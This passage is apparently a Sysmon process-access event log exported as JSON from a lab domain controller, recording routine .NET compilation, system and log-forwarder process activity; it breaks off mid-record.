{"EventTime":"2020-08-01 07:01:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7657,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:08.543\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1334-5F25-0000-001028E10B00}\r\nTargetProcessId: 4976\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:08.543","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1334-5F25-0000-001028E10B00}","TargetProcessId":"4976","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7658,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:08.622\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1334-5F25-0000-001069E40B00}\r\nTargetProcessId: 2624\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:08.622","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1334-5F25-0000-001069E40B00}","TargetProcessId":"2624","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7659,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:08.622\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1334-5F25-0000-001069E40B00}\r\nTargetProcessId: 2624\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:08.622","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1334-5F25-0000-001069E40B00}","TargetProcessId":"2624","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7660,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:08.622\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1334-5F25-0000-001069E40B00}\r\nTargetProcessId: 2624\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:08.622","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1334-5F25-0000-001069E40B00}","TargetProcessId":"2624","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7661,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:08.637\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:08.637","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7662,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:08.700\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1334-5F25-0000-00101BE80B00}\r\nTargetProcessId: 4616\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:08.700","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1334-5F25-0000-00101BE80B00}","TargetProcessId":"4616","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7663,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:08.700\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1334-5F25-0000-00101BE80B00}\r\nTargetProcessId: 4616\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:08.700","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1334-5F25-0000-00101BE80B00}","TargetProcessId":"4616","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7664,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:08.700\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1334-5F25-0000-00101BE80B00}\r\nTargetProcessId: 4616\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 